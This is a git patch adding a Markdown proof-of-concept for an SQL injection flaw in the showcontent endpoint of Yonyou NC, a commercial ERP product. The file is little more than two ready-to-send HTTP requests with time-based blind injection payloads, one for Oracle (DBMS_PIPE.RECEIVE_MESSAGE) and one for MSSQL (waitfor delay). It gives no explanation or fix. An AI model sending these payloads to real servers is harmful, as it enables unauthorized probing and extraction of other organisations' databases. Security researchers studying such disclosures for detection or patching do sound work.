From dfae0780569e4469627214954222fe22ecf7185e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 21 Apr 2024 01:32:18 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BNC-showcontent?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8sql=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC-showcontent接口存在sql注入漏洞.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 用友NC-showcontent接口存在sql注入漏洞.md diff --git a/用友NC-showcontent接口存在sql注入漏洞.md b/用友NC-showcontent接口存在sql注入漏洞.md new file mode 100644 index 0000000..ef112cb --- /dev/null +++ b/用友NC-showcontent接口存在sql注入漏洞.md @@ -0,0 +1,22 @@ +## 用友NC-showcontent接口存在sql注入漏洞 + + +## poc +``` +orale: +GET /ebvp/infopub/showcontent?id=1'%20AND%203983=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(76)||CHR(108)||CHR(101),9)%20AND%20'Mgtn'='Mgtn HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: identity +Connection: close +Content-Type: text/xml; charset=utf-8 +SL-CE-SUID: 31 + + + +mssql: +GET /ebvp/infopub/showcontent?id=1'%20waitfor%20delay%20'0:0:6 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 + +```